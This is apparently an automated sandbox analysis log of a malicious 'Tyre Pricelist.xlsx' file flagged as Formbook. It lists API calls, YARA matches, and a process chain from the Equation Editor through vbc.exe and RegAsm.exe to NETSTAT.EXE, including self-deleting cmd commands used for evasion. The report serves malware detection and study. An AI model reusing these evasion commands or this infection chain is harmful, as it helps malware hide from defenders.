          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E00 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E80 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099DA4 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099DFE NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E7A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B70D
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B692
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106AAA2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B6E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041D906
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DB32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DBA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041E5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DE55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409E2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DF6E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041D781
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CF93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E1238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253E2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02547353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0258A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02542305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025663DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253F3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E63BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02543040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256D005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253E0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0258A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E2622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02544680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025757C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0257D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02575485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02551489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02586540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025F3A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02567B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253FBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025CDBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025ECBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DF8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C5955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025569FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025429B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02572E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256DF7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02550F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025B2FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DCFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02570D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DFDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B1069
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B1072
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B8132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BAA32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BDA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BDB0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B5B1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B5B22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B2CEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B2CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5E0C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C63040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7905A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8D005
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5E2E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D01238
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5F3CF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C863DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D063BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C67353
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CAA37B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C62305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C95485
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C71489
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C9D47D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7C5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CA6540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6351F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6E6C1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C64680
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D02622
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CAA634
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C957C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CE579A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6C7BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CFF8EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6C85C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8286D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C769FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0098E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C629B2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CE5955
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D13A83
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5FBD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CEDBDA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0CBA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C87B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CFFDDD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6CD5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C90D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7EE4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C92E2F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8DF7C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C70F3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009E5ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009D781
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00082D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00089E2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00089E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009DE55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009DF6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CF93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00082FB0
          Source: Tyre Pricelist.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CA3F92 appears 108 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CA373B appears 238 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00C5E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CCF970 appears 81 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00C5DF5C appears 118 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0253E2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0253DF5C appears 119 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 025AF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0258373B appears 244 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02583F92 appears 132 times
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: svchost[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@15/3@3/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Tyre Pricelist.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR167C.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e.....................%.............(.%.....2.......D...............
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................P...........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys....@.%.....4.......................(.%.....&.......................
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ................................`3......(.P.....P.......................%.......................................................................
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ................................Y.......(.P.....P...............................................................................................
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ........................................(.P.....P...............................................................................................
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Tyre Pricelist.xlsxVirustotal: Detection: 27%
          Source: Tyre Pricelist.xlsxReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
